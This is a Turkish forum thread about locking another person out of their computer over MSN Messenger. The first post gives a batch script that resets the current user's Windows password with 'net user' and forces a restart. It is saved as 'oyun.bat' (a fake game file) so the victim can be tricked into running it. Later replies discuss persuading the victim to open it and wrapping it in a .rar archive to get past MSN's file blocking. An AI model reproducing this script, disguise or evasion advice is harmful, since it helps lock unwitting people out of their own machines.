msn den karşı pc ye şifre koyma

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

mert.akdag

Banned
Reaction score
0
arkadaşlar önceden verildimi bilmiorum ama not defterinizi pc den açıp
net user %username% 111111
shutdown -r
oyun.bat
not defterine bunları yazıp ve 111111 yerine başka şifre yazar ve msn den karşı tarafa açtırırsak pc ye şifre koymuş oluyosunuz ben denedim kendi pc de oldu ama dosya türü bat. olucak iyi eğlenceler

arkadaşlar tşk butonuna basmayı unutmayın :D

MSNDEN KARSI TARAFA NASIL ACTIRCAZZ :S YENIYIM DE :D
SEN BENIM BU ISI YAPTIR SANA TŞK EDERIMM O ZAMAN :d
AMA BIRAZ ACIL YARDIMM :d

arkadaşım bak şimdi bunu not defterinde yap ve farklı kaydet de orda isme mesela oyun.bat de ondan sora da o ms dos dan açar ve sen kendinde açarsan snn pc ye şifre koyar sen öle karşı tarafa at ve ona açtırmaya ikna et ve açınca 30 sn sora şifre yi koyup pc reset atıo kendiliğinden :D

arkadaş ım yermi bizim anadolu çocugu zaten yedirsek keylogger la alınır ama bu daha basit bi yöntem gibi

arkadaşım tamam hoşta hani paylaşımın içinde teşekkür ama bunu karşı kabul etmiyo kişi değil yalnız bilg. kabbul etmiyo yani dosya o kadar kalitesiz ki(üstüne alınma:D) windows yada msn dosyaı kabul etmiyo acaba oyun.bat yerine başka bir bat dosyası verebilirmiyiz eğer verbiliyosak veya kabul ettiren varsa karşıya bana yöntemini sölerse memnun olurum kendiznize ii bakın şimdiden saolun

arkadaşım ne dedğinde fazla bişe anlamadım ama bak şimdi bunu not defterinde ya ve bunu farklı kaydetten bat dosyasında kayıt et ister kendi pc de aç şifre koysun istersen msn den karşı tarafa yolla şifre koysun olay bu başka bişe yok :D

DareDevel_' Alıntı:
arkadaşım tamam hoşta hani paylaşımın içinde teşekkür ama bunu karşı kabul etmiyo kişi değil yalnız bilg. kabbul etmiyo yani dosya o kadar kalitesiz ki(üstüne alınma:D) windows yada msn dosyaı kabul etmiyo acaba oyun.bat yerine başka bir bat dosyası verebilirmiyiz eğer verbiliyosak veya kabul ettiren varsa karşıya bana yöntemini sölerse memnun olurum kendiznize ii bakın şimdiden saolun
.rar diye bi dosya formatı var bilrsen msn .bat .exe gibi dosyaları yollamaz kalitesiz filan değil yağni oyun.bat olması zorunlu değil ama .bat formatı gerekli kodlar o formata göre yazılmış dediğim gibi .rar yap(arşive eklemek) ve yolla bu shekilde yaprsın

Teşekkürler kardeşim... Umarım işe yarar...

oyun.bat ı da not defterinin içinemi yazıcaz . yoksa dosya ismi olarak oyun.bat yazıpta yutturmamız içinmi yazdın ..

Birde Xp de oluyor değilmi Windows98 felan değil?

arkadaşım not defterinin içine oyun.bat yazmana gerek yok sadece farlklı kaydet'de oyun .bat yap yeter :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri